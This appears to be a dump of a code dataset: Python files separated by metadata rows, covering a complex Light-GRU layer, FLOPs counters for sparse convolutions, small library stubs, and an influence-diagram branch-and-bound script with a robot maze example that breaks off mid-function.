self.nonlinearity = nonlinearity
self.w = CLinear(
input_shape=self.input_size,
n_neurons=self.hidden_size * 2,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
self.u = CLinear(
input_shape=self.hidden_size * 2, # The input size is in real
n_neurons=self.hidden_size * 2,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
if self.bidirectional:
self.batch_size = self.batch_size * 2
# Initializing batch norm
self.normalize = False
if self.normalization == "batchnorm":
self.norm = CBatchNorm(
input_size=hidden_size * 2, dim=-1, momentum=0.05,
)
self.normalize = True
elif self.normalization == "layernorm":
self.norm = CLayerNorm(input_size=hidden_size * 2, dim=-1)
self.normalize = True
else:
# Normalization is disabled here. self.norm is only formally
# initialized to avoid jit issues.
self.norm = CLayerNorm(input_size=hidden_size * 2, dim=-1)
self.normalize = True
# Initial state
self.h_init = torch.zeros(1, self.hidden_size * 2, requires_grad=False)
# Preloading dropout masks (gives some speed improvement)
self._init_drop(self.batch_size)
# Initializing dropout
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
# Setting the activation function
if self.nonlinearity == "tanh":
self.act = torch.nn.Tanh()
else:
self.act = torch.nn.ReLU()
def forward(self, x, hx=None):
# type: (Tensor, Optional[Tensor], Optional[Bool]) -> Tensor # noqa F821
"""Returns the output of the Complex liGRU layer.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
if self.bidirectional:
x_flip = x.flip(1)
x = torch.cat([x, x_flip], dim=0)
# Change batch size if needed
self._change_batch_size(x)
# Feed-forward affine transformations (all steps in parallel)
w = self.w(x)
# Apply batch normalization
if self.normalize:
w_bn = self.norm(w.reshape(w.shape[0] * w.shape[1], w.shape[2]))
w = w_bn.reshape(w.shape[0], w.shape[1], w.shape[2])
# Processing time steps
if hx is not None:
h = self._complex_ligru_cell(w, hx)
else:
h = self._complex_ligru_cell(w, self.h_init)
if self.bidirectional:
h_f, h_b = h.chunk(2, dim=0)
h_b = h_b.flip(1)
h = torch.cat([h_f, h_b], dim=2)
return h
def _complex_ligru_cell(self, w, ht):
"""Returns the hidden states for each time step.
Arguments
---------
wx : torch.Tensor
Linearly transformed input.
"""
hiddens = []
# Sampling dropout mask
drop_mask = self._sample_drop_mask()
# Loop over time axis
for k in range(w.shape[1]):
gates = w[:, k] + self.u(ht)
atr, ati, ztr, zti = gates.chunk(4, 1)
at = torch.cat([atr, ati], dim=-1)
zt = torch.cat([ztr, zti], dim=-1)
zt = torch.sigmoid(zt)
hcand = self.act(at) * drop_mask
ht = zt * ht + (1 - zt) * hcand
hiddens.append(ht)
# Stacking hidden states
h = torch.stack(hiddens, dim=1)
return h
def _init_drop(self, batch_size):
"""Initializes the recurrent dropout operation. To speed it up,
the dropout masks are sampled in advance.
"""
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
self.N_drop_masks = 16000
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2)
).data
def _sample_drop_mask(self,):
"""Selects one of the pre-defined dropout masks.
"""
if self.training:
# Sample new masks when needed
if self.drop_mask_cnt + self.batch_size > self.N_drop_masks:
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
# Sampling the mask
drop_mask = self.drop_masks[
self.drop_mask_cnt : self.drop_mask_cnt + self.batch_size
]
self.drop_mask_cnt = self.drop_mask_cnt + self.batch_size
else:
drop_mask = self.drop_mask_te
return drop_mask
def _change_batch_size(self, x):
"""This function changes the batch size when it is different from
the one detected in the initialization method. This might happen in
the case of multi-gpu or when we have different batch sizes in train
and test. We also update the h_int and drop masks.
"""
if self.batch_size != x.shape[0]:
self.batch_size = x.shape[0]
if self.training:
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size)
).data
| 32.00339 | 97 | 0.583757 | 4,707 | 37,764 | 4.542384 | 0.073932 | 0.032272 | 0.029465 | 0.014733 | 0.924185 | 0.918619 | 0.911884 | 0.90702 | 0.901034 | 0.880735 | 0 | 0.010428 | 0.327084 | 37,764 | 1,179 | 98 | 32.030534 | 0.830946 | 0.387618 | 0 | 0.856637 | 0 | 0 | 0.006502 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053097 | false | 0 | 0.00708 | 0 | 0.107965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
336f9cc7d54409add6778480cef157c8eb95ae8b | 103 | py | Python | tests/data/example.py | Korijn/pygui | 11be153bbdc389c5749ed82490289d6e2c2f704c | [
"MIT"
] | 2 | 2022-02-22T08:10:03.000Z | 2022-02-22T08:21:48.000Z | tests/data/example.py | Korijn/pygui | 11be153bbdc389c5749ed82490289d6e2c2f704c | [
"MIT"
] | 7 | 2022-02-24T16:38:45.000Z | 2022-03-10T08:31:13.000Z | tests/data/example.py | fork-tongue/collagraph | 7370b4ad8bc58a04c644be5be241e4ccb40f8893 | [
"MIT"
] | null | null | null | import collagraph as cg
def example_func_component(props):
return cg.h("example-func-component")
| 17.166667 | 41 | 0.76699 | 15 | 103 | 5.133333 | 0.733333 | 0.285714 | 0.519481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135922 | 103 | 5 | 42 | 20.6 | 0.865169 | 0 | 0 | 0 | 0 | 0 | 0.213592 | 0.213592 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
681bb0412ec75b0f335656d194ddb2351bdf3f92 | 1,254 | py | Python | utils/flops.py | yydlmzyz/PCGCv2 | 21ec0871543a89ed9e7aa1a1efa58341cbc7ff6b | [
"Apache-2.0"
] | 13 | 2020-11-30T10:11:19.000Z | 2022-02-16T10:53:21.000Z | utils/flops.py | xtorker/PCGCv2 | 845e8ac02d9393ee129392c6f47504894c5870c3 | [
"Apache-2.0"
] | null | null | null | utils/flops.py | xtorker/PCGCv2 | 845e8ac02d9393ee129392c6f47504894c5870c3 | [
"Apache-2.0"
] | 2 | 2021-10-20T13:06:21.000Z | 2021-12-10T16:49:20.000Z | import torch
import MinkowskiEngine as ME
import numpy as np
def _count_sparse_conv(kernel_size, in_channels, out_channels):
total_params = pow(kernel_size[0], 3) * in_channels * out_channels + out_channels
return total_params
def count_sparse_conv(m: ME.MinkowskiConvolution, x: ME.SparseTensor, y: ME.SparseTensor):
total_params = _count_sparse_conv(m.kernel_size, m.in_channels, m.out_channels)
n_points = len(y.C)
m.total_params += torch.DoubleTensor([int(total_params)])
# print(np.int64(total_params) * np.int64(n_points)/pow(10,9))
m.total_ops += torch.LongTensor([np.int64(total_params) * np.int64(n_points)])
def _count_sparse_deconv(kernel_size, in_channels, out_channels):
total_params = pow(kernel_size[0], 3) * in_channels * out_channels + out_channels
return total_params
def count_sparse_deconv(m: ME.MinkowskiConvolutionTranspose, x: ME.SparseTensor, y: ME.SparseTensor):
total_params = _count_sparse_deconv(m.kernel_size, m.in_channels, m.out_channels)
n_points = len(y.C)
m.total_params += torch.DoubleTensor([int(total_params)])
# print(m, np.int64(total_params) * np.int64(n_points)/pow(10,9))
m.total_ops += torch.LongTensor([np.int64(total_params) * np.int64(n_points)])
| 46.444444 | 101 | 0.751994 | 193 | 1,254 | 4.585492 | 0.212435 | 0.174011 | 0.128814 | 0.094915 | 0.813559 | 0.813559 | 0.813559 | 0.813559 | 0.813559 | 0.813559 | 0 | 0.023723 | 0.125997 | 1,254 | 26 | 102 | 48.230769 | 0.783759 | 0.098884 | 0 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.157895 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
681c21cbc63af2f1a5efa31fc1755152cde9557e | 134 | py | Python | cpp_python_module.py | csrunner/new_feat | 5174312634c696b022f624a047d1dcb7435dfeba | [
"MIT"
] | null | null | null | cpp_python_module.py | csrunner/new_feat | 5174312634c696b022f624a047d1dcb7435dfeba | [
"MIT"
] | null | null | null | cpp_python_module.py | csrunner/new_feat | 5174312634c696b022f624a047d1dcb7435dfeba | [
"MIT"
] | null | null | null | def cpp_call_python_func(a):
return a + 1
from python_call_cpp_module import python_call_cpp_func
print(python_call_cpp_func(2)) | 26.8 | 55 | 0.820896 | 25 | 134 | 3.92 | 0.52 | 0.306122 | 0.397959 | 0.346939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016949 | 0.119403 | 134 | 5 | 56 | 26.8 | 0.813559 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
6844c6186d465d2c54c724504a2ebf92d35edcbb | 132 | py | Python | ivy/array/general.py | sert121/ivy | 286f86e487b0c83d46a3ef8d30aa96316337db32 | [
"Apache-2.0"
] | 161 | 2021-01-20T22:11:13.000Z | 2022-01-09T09:46:33.000Z | ivy/array/general.py | sert121/ivy | 286f86e487b0c83d46a3ef8d30aa96316337db32 | [
"Apache-2.0"
] | 4 | 2021-11-10T17:04:36.000Z | 2021-11-26T06:40:43.000Z | ivy/array/general.py | sert121/ivy | 286f86e487b0c83d46a3ef8d30aa96316337db32 | [
"Apache-2.0"
] | 8 | 2021-02-17T20:56:33.000Z | 2022-01-09T16:45:40.000Z | # global
import abc
# ToDo: implement all general methods here as public class methods
class ArrayWithGeneral(abc.ABC):
pass
| 14.666667 | 66 | 0.757576 | 18 | 132 | 5.555556 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189394 | 132 | 8 | 67 | 16.5 | 0.934579 | 0.537879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
d7b2b7f0bc5bbce66fa9177f9f54b931cb24db72 | 30 | py | Python | atcoder/abc163/a.py | sugitanishi/competitive-programming | 51af65fdce514ece12f8afbf142b809d63eefb5d | [
"MIT"
] | null | null | null | atcoder/abc163/a.py | sugitanishi/competitive-programming | 51af65fdce514ece12f8afbf142b809d63eefb5d | [
"MIT"
] | null | null | null | atcoder/abc163/a.py | sugitanishi/competitive-programming | 51af65fdce514ece12f8afbf142b809d63eefb5d | [
"MIT"
] | null | null | null | print(int(input())*2*3.141592) | 30 | 30 | 0.7 | 6 | 30 | 3.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 0 | 30 | 1 | 30 | 30 | 0.433333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
d7b58b1a71fc82d063cc971ae0fd6a0a2f919284 | 158 | py | Python | cornucopia/views/tokens.py | AlexandraAlter/django-cornucopia | 1681ccbc5e98736e61f6afb1b78931dda9547486 | [
"MIT"
] | null | null | null | cornucopia/views/tokens.py | AlexandraAlter/django-cornucopia | 1681ccbc5e98736e61f6afb1b78931dda9547486 | [
"MIT"
] | null | null | null | cornucopia/views/tokens.py | AlexandraAlter/django-cornucopia | 1681ccbc5e98736e61f6afb1b78931dda9547486 | [
"MIT"
] | null | null | null | from django import http, views
class TokenListView(views.View):
pass
class NewTokenView(views.View):
pass
class TokenView(views.View):
pass
| 11.285714 | 32 | 0.71519 | 20 | 158 | 5.65 | 0.55 | 0.238938 | 0.345133 | 0.318584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202532 | 158 | 13 | 33 | 12.153846 | 0.896825 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.428571 | 0.142857 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
d7e64e084f978deaa3d7b6e932b54b66f16a783e | 94 | py | Python | Chapter 02/ch2_35.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | f6a4194684515495d00aa38347a725dd08f39a0c | [
"MIT"
] | null | null | null | Chapter 02/ch2_35.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | f6a4194684515495d00aa38347a725dd08f39a0c | [
"MIT"
] | null | null | null | Chapter 02/ch2_35.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | f6a4194684515495d00aa38347a725dd08f39a0c | [
"MIT"
] | null | null | null | import math
print(math.sin(0))
print(math.sin(45.5))
# using print() to print the result | 18.8 | 36 | 0.680851 | 17 | 94 | 3.764706 | 0.647059 | 0.28125 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051282 | 0.170213 | 94 | 5 | 36 | 18.8 | 0.769231 | 0.351064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
0bdd40d75a85044f5f80c90fd6efbbe5d7d19f2c | 49,430 | py | Python | branchAndBound/exemple_robot.py | davidPinaud/PANDROIDE_InfDiag_BandB | 1e5bafaf81f5f677b685c5382694a3ccb85963ab | [
"MIT"
] | null | null | null | branchAndBound/exemple_robot.py | davidPinaud/PANDROIDE_InfDiag_BandB | 1e5bafaf81f5f677b685c5382694a3ccb85963ab | [
"MIT"
] | null | null | null | branchAndBound/exemple_robot.py | davidPinaud/PANDROIDE_InfDiag_BandB | 1e5bafaf81f5f677b685c5382694a3ccb85963ab | [
"MIT"
] | null | null | null |
from pylab import *
import math
import pyAgrum as gum
import pyAgrum.lib.notebook as gnb
import numpy as np
from bandbLIMID import BranchAndBoundLIMIDInference
import time
def createRandomID(nbDecisionNodes:int,nbChanceNodes:int,nbUtilityNode:int,nbArc:int,nbAppel=0,verbose=False)->gum.InfluenceDiagram:
"""creates a random ID
Parameters
----------
nbDecisionNodes : int
number of decision nodes
nbChanceNodes : int
number of chance nodes
nbUtilityNode : int
number of utility nodes
nbArc : int
number of arcsnodes
Returns
-------
gum.InfluenceDiagram
the random ID
"""
if(verbose):
print(f"try n°{nbAppel+1}")
dagTestCycle=gum.DAG()
stringID=""
dec=dict()
chance=dict()
utility=dict()
for i in range(nbDecisionNodes):
#ID.addDecisionNode(gum.LabelizedVariable(aName=f"d{i}",aDesc="",nbrLabel=np.random.randint(0,6)))
stringID+=f"*d{i};"
dec[f'd{i}']=dagTestCycle.addNode()
for i in range(nbChanceNodes):
#ID.addChanceNode(gum.LabelizedVariable(aName=f"c{i}",aDesc="",nbrLabel=np.random.randint(0,6)))
stringID+=f"c{i};"
chance[f'c{i}']=dagTestCycle.addNode()
for i in range(nbUtilityNode):
#ID.addUtilityNode(gum.LabelizedVariable(aName=f"u{i}",aDesc="",nbrLabel=1))
stringID+=f"$u{i};"
utility[f'u{i}']=dagTestCycle.addNode()
for i in range(nbArc):
debut=time.time()
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
elif(time.time()-debut>0.000001 and nbAppel>3):
raise Exception("Echec de construction d'ID, veuillez recommencer")
r=np.random.randint(1,5)
found=False
# while(r==0 and not found):
# print("1")
# print("°")
# d1=np.random.randint(0,nbDecisionNodes)
# d2=np.random.randint(0,nbDecisionNodes)
# if(time.time()-debut>0.000001 and nbAppel<=3):
# return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
# try:
# dagTestCycle.addArc(dec[f"d{d1}"],dec[f"d{d2}"])
# stringID+=f"d{d1}->d{d2};"
# found=True
# except:
# found=False
while(r==1 and not found):
print("2")
print("°")
d=np.random.randint(0,nbDecisionNodes)
c=np.random.randint(0,nbChanceNodes)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(dec[f"d{d}"],chance[f"c{c}"])
stringID+=f"d{d}->c{c};"
found=True
except:
found=False
while(r==2 and not found):
print("3")
print("°")
d=np.random.randint(0,nbDecisionNodes)
c=np.random.randint(0,nbChanceNodes)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(chance[f"c{c}"],dec[f"d{d}"])
stringID+=f"c{c}->d{d};"
found=True
except:
found=False
while(r==3 and not found):
print("4")
print("°")
c1=np.random.randint(0,nbChanceNodes)
c2=np.random.randint(0,nbChanceNodes)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(chance[f"c{c1}"],chance[f"c{c2}"])
stringID+=f"c{c1}->c{c2};"
found=True
except:
found=False
# while(r==4 and not found):
# print("5")
# print("°")
# c=np.random.randint(0,nbChanceNodes)
# u=np.random.randint(0,nbUtilityNode)
# if(time.time()-debut>0.000001 and nbAppel<=3):
# return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
# try:
# dagTestCycle.addArc(chance[f"c{d}"],utility[f"u{u}"])
# stringID+=f"c{c}->u{u};"
# found=True
# except:
# found=False
while(r==4 and not found):
print("5")
print("°")
d=np.random.randint(0,nbDecisionNodes)
u=np.random.randint(0,nbUtilityNode)
if(time.time()-debut>0.000001 and nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
try:
dagTestCycle.addArc(dec[f"d{d}"],utility[f"u{u}"])
stringID+=f"d{d}->u{u};"
found=True
except:
found=False
try:
ID=gum.fastID(stringID)
for node in ID.nodes():
if(ID.isUtilityNode(node) and not ID.parents(node)):
nodeID=np.random.choice([nodeID for nodeID in ID.nodes() if not ID.isUtilityNode(nodeID)],size=1)
print("choices",nodeID[0],node,type(nodeID[0]),type(node))
ID.addArc(int(nodeID[0]),node)
except:
if(nbAppel<=3):
return createRandomID(nbDecisionNodes,nbChanceNodes,nbUtilityNode,nbArc,nbAppel=nbAppel+1)
return ID
def createIDRobot(n,xInitial,yInitial,maze):
"""Function that allows to create the ID given as an exemple in the 2013 "solving limited memory influence diagram" paper
Parameters
----------
n : int
number of stage in the exemple
xInitial : int
the x axis initial position of the robot
yInitial : int
the y axis initial position of the robot
maze : str
the maze for which we create the example, it chances the values of the CPT
Returns
-------
InfluenceDiagram
the example ID
"""
"""
chances contient tous les identifiants des noeuds chance de l'ID, par convention, si l'ID est égal à
0 mod(6) --> le noeud est un x
1 mod(6) --> le noeud est un y
2 mod(6) --> le noeud est un n
3 mod(6) --> le noeud est un e
4 mod(6) --> le noeud est un s
5 mod(6) --> le noeud est un w
decision contient tous les identifiants des noeuds décisions de l'ID, par convention, si l'ID est égal à
6*n+i pour tout i appartenant à 0,...,n-1, le noeud est le noeud décision de la ième étape.
"""
"""
Méthode permettant de créer le diagramme d'influence de l'exemple du robot vu dans l'article "2013_Solving_Limited_Memory_Influence_Diagrams_Using_BranchAndBound"
Entrée :
n - nombre de stage
xInitial - coordonnée x initial où on dépose le robot
yInitial - coordonnée y initial où on dépose le robot
Sortie :
ID - le diagramme d'influence correspondant à la modélisation du problème
"""
#gris est l'ensemble des coordonnées des cases grises
cases,gris,caseObj,nbLignes,nbColonnes=getCasesAndGris2(maze)
#listes qui énumère les cases ou on peut faire un pas dans une certaine direction (càd pas de mur dans cette direction quand on est sur cette case)
casesOuPossibleAllerGauche=[]
casesOuPossibleAllerHaut=[]
casesOuPossibleAllerDroite=[]
casesOuPossibleAllerBas=[]
#constructions des listes ci-dessus
for x in range(nbLignes):
for y in range(nbColonnes):
if(cases[x,y,0]==0):
casesOuPossibleAllerGauche.append([x,y])
if(cases[x,y,1]==0):
casesOuPossibleAllerHaut.append([x,y])
if(cases[x,y,2]==0):
casesOuPossibleAllerDroite.append([x,y])
if(cases[x,y,3]==0):
casesOuPossibleAllerBas.append([x,y])
#création de l'ID
ID=gum.fastID("")
#tous les noeuds chances, regroupés selon leur stages (0 étant celui du premier stage)
chances=np.zeros((n,6))
#tous les noeuds décisions, celui à l'indice 0 étant celui du premier stage
decision=np.zeros(n)
for i in range(n):
#définition des noms, pour eviter les opérations non necessaires
x=f"x_{i}"
y=f"y_{i}"
ns=f"ns_{i}"
es=f"es_{i}"
ss=f"ss_{i}"
ws=f"ws_{i}"
d=f"d_{i}"
#Création des noeuds
#ajout noeuds position x
chances[i][0]=int(ID.addChanceNode(gum.LabelizedVariable(x,"",nbLignes),6*i))
#ajout noeuds position y
chances[i][1]=int(ID.addChanceNode(gum.LabelizedVariable(y,"",nbColonnes),6*i+1))
#ajout noeuds capteurs selon coordonnées cardinales
chances[i][2]=ID.addChanceNode(gum.LabelizedVariable(ns,"",2),6*i+2)
chances[i][3]=ID.addChanceNode(gum.LabelizedVariable(es,"",2),6*i+2+1)
chances[i][4]=ID.addChanceNode(gum.LabelizedVariable(ss,"",2),6*i+2+2)
chances[i][5]=ID.addChanceNode(gum.LabelizedVariable(ws,"",2),6*i+2+3)
#ajout noeud de décision
decision[i]=int(ID.addDecisionNode(gum.LabelizedVariable(d,"",5),i+50000))
#Creation des arcs entre x,y et les capteurs de l'étape courante
ID.addArc(x,y)
ID.addArc(x,ns)
ID.addArc(x,es)
ID.addArc(x,ss)
ID.addArc(x,ws)
ID.addArc(y,ns)
ID.addArc(y,es)
ID.addArc(y,ss)
ID.addArc(y,ws)
#Création des arcs depuis TOUS les noeuds chances des capteurs vers le noeud de décision courant
#de l'étape
for stage in range(i+1):
ID.addArc(int(chances[(stage)][2]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][3]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][4]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][5]),ID.idFromName(d))
#Création des arcs depuis x_i-1 vers x_i et de y_i-1 vers y_i (seulement à partir de la deuxième étape)
if(i>0):
ID.addArc(f"x_{i-1}",y)
ID.addArc(f"x_{i-1}",x)
ID.addArc(f"y_{i-1}",y)
ID.addArc(f"y_{i-1}",x)
ID.addArc(f"d_{i-1}",f"d_{i}")
#Création des arcs entre le noeud de décision de la i-1 ème étape vers x_i et y_i
ID.addArc(f"d_{i-1}",x)
ID.addArc(f"d_{i-1}",y)
#ajout potentiels des noeuds chance capteur ns es ss ws, de support {0=pas mur,1=mur}
for h in range(nbLignes):
for j in range(nbColonnes):
if([h,j] in casesOuPossibleAllerHaut):
ID.cpt(ns)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerBas):
ID.cpt(ss)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ss)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerDroite):
ID.cpt(es)[{x:h,y:j}]=[1,0]
else:
ID.cpt(es)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerGauche):
ID.cpt(ws)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ws)[{x:h,y:j}]=[0,1]
if [h,j] in gris:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
ID.cpt(es)[{x:h,y:j}]=[0,1]
ID.cpt(ss)[{x:h,y:j}]=[0,1]
ID.cpt(ws)[{x:h,y:j}]=[0,1]
"""#ajout potentiels des noeuds positions x y au premier stage
if(i==0):
ID.cpt(x)[xInitial]=1
ID.cpt(y)[{x:xInitial,y:yInitial}]=1
#ajout potentiels des noeuds positions x y aux stages qui ne sont pas le premier stage
else:
remplirID(ID,x,fillX,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,y,fillY,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)"""
#Ajout des arcs entre le dernier noeud décision, les derniers noeuds chances x et y avec le noeud utilité
xn=f"x_{n}"
yn=f"y_{n}"
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(xn,"",nbLignes)))
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(yn,"",nbColonnes)))
ID.addArc(xn,yn)
ID.addUtilityNode(gum.LabelizedVariable("u","",1))
ID.addArc(xn,"u")
ID.addArc(yn,"u")
ID.addArc(f"x_{n-1}",xn)
ID.addArc(f"y_{n-1}",xn)
ID.addArc(f"x_{n-1}",yn)
ID.addArc(f"y_{n-1}",yn)
#ajout potentiels des derniers noeuds chances et du noeud d'utilité
"""remplirID(ID,xn,fillX,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,yn,fillY,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
"""
ID.utility(ID.idFromName("u"))[{f"x_{n}":caseObj[0],f"y_{n}":caseObj[1]}]=1
l=[]
for k in range(n):
x=f"x_{k}"
y=f"y_{k}"
l.append(x)
l.append(y)
l=l+[xn,yn]
for node in l:
for i in ID.cpt(node).loopIn():
ID.cpt(node).set(i,np.random.rand())
ID.cpt(node).normalizeAsCPT()
return ID
def remplirID(ID,NomNoeud,fonctionFill,stage,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
"""
Méthode qui sert à remplir le tableau de potentiel des noeuds positions x et y aux stages après au premier stage
Entrée :
InfluenceDiagram ID - le diagramme d'influence sur lequel trouver tous les noeuds
String NomNoeud - le nom du noeud qu'on veut remplir le tableau de potentiel
function fonctionFill - la fonction utilisée afin de remplir les cases du tableau
Integer stage - entier qui identifie le stage courant
Sortie:
void
"""
I=gum.Instantiation(ID.cpt(NomNoeud))
while not I.end():
ID.cpt(NomNoeud).set(I,fonctionFill(I,stage,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris))
I.inc()
def fillX(I,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
valeurXStageDavant,valeurYStageDavant,valeurX,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"d_{i-1}"]]
"""
Méthode qui sert à déterminer quelle probabilité on introduit dans la case d'un certain tableau de potentiel d'un noeud chance correspondant à la position X (abscisse) du robot à un certain stage.
Entrée :
Instantiation I - correspond à une certaine case du tableau de potentiel qu'on remplit, on fait des tests dessus afin de savoir quelle probabilité donner à cette case.
Integer i - entier correspondant au stage courant.
"""
if([valeurXStageDavant,valeurYStageDavant] in gris):
return 0
if(abs(valeurX-valeurXStageDavant)>1):
return 0
#-----------------------
